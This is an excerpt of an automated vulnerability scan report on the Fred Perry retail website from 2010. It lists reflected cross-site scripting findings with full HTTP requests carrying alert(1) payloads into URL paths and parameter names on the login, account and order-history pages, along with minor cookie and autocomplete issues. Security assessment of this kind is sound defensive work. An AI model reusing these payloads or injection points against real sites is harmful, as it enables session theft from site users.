Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3987"-alert(1)-"e15c6a40149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/woven-shirtse3987"-alert(1)-"e15c6a40149/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pifjben75gbg7vjdt8e2c1rte2; expires=Tue, 09-Nov-2010 17:10:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/woven-shirtse3987"-alert(1)-"e15c6a40149/");
//]]>
...[SNIP]...

1.281. http://www.fredperry.com/women/woven-shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd97"-alert(1)-"328bf5904c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/woven-shirts/?5dd97"-alert(1)-"328bf5904c4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:08:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v475frll84i348g101n8b65cs0; expires=Tue, 09-Nov-2010 17:08:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/woven-shirts/?5dd97"-alert(1)-"328bf5904c4=1");
//]]>
...[SNIP]...

1.282. https://www.fredperry.com/customer/account/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c3dc"-alert(1)-"76794ee1910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer8c3dc"-alert(1)-"76794ee1910/account/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lig1hamq19vigkptie5smff0h3; expires=Tue, 09-Nov-2010 17:28:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer8c3dc"-alert(1)-"76794ee1910/account/");
//]]>
...[SNIP]...

1.283. https://www.fredperry.com/customer/account/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58371"-alert(1)-"854ac7c6992 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account58371"-alert(1)-"854ac7c6992/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=btgkebc10t2gjuigr3f5i4g5a6; expires=Tue, 09-Nov-2010 17:28:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account58371"-alert(1)-"854ac7c6992/");
//]]>
...[SNIP]...

1.284. https://www.fredperry.com/customer/account/login/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b84ec"-alert(1)-"731c73bbde8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customerb84ec"-alert(1)-"731c73bbde8/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i750lfosl1s47pnanmg5inj6p2; expires=Tue, 09-Nov-2010 17:28:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customerb84ec"-alert(1)-"731c73bbde8/account/login/");
//]]>
...[SNIP]...

1.285. https://www.fredperry.com/customer/account/login/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61c53"-alert(1)-"5e56b29bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account61c53"-alert(1)-"5e56b29bc4/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j89bi60c7faef84lhq7uka42e5; expires=Tue, 09-Nov-2010 17:28:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account61c53"-alert(1)-"5e56b29bc4/login/");
//]]>
...[SNIP]...

1.286. https://www.fredperry.com/customer/account/login/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e47f"-alert(1)-"623ae57ed21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account/login1e47f"-alert(1)-"623ae57ed21/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t09b9es2tf5c0lopedavb2inm0; expires=Tue, 09-Nov-2010 17:29:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account/login1e47f"-alert(1)-"623ae57ed21/");
//]]>
...[SNIP]...

1.287. https://www.fredperry.com/customer/account/login/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc2d"-alert(1)-"f9ade8fa6f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account/login/?ddc2d"-alert(1)-"f9ade8fa6f6=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:27:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eckdao25lgvnp6vtl5hl6anr14; expires=Tue, 09-Nov-2010 17:27:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account/login/?ddc2d"-alert(1)-"f9ade8fa6f6=1");
//]]>
...[SNIP]...

1.288. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c01"-alert(1)-"bf363aed77c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1 HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 18:41:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3pfqrlqdvcu228fqdlisdgne45; expires=Tue, 09-Nov-2010 19:41:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1");
//]]>
...[SNIP]...

1.289. https://www.fredperry.com/sales/order/history/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36d4e"-alert(1)-"4939634274c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales36d4e"-alert(1)-"4939634274c/order/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=utkl6i851mv1292i1u4cilrvo3; expires=Tue, 09-Nov-2010 17:28:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales36d4e"-alert(1)-"4939634274c/order/history/");
//]]>
...[SNIP]...

1.290. https://www.fredperry.com/sales/order/history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc3d"-alert(1)-"9878bb43d9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales/order5fc3d"-alert(1)-"9878bb43d9f/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=loigkgvlq3rk860abto84uanr5; expires=Tue, 09-Nov-2010 17:29:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales/order5fc3d"-alert(1)-"9878bb43d9f/history/");
//]]>
...[SNIP]...

1.291. https://www.fredperry.com/sales/order/history/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f660f"-alert(1)-"21f8a2e8aaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3kg62colr7hf79g2ki8eq19c01; expires=Tue, 09-Nov-2010 17:29:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/");
//]]>
...[SNIP]...

2. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
</div>

<form action="https://www.fredperry.com/customer/account/loginPost/" method="post" id="login-form">
<fieldset class="col2-set login-page">
...[SNIP]...
<br />
<input name="login[password]" type="password" class="input-text required-entry validate-password" id="pass" title="Password" /><br />
...[SNIP]...

3. SSL cookie without secure flag set  previous  next
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://www.fredperry.com/customer/account/  previous  next

Summary

Severity:   Information
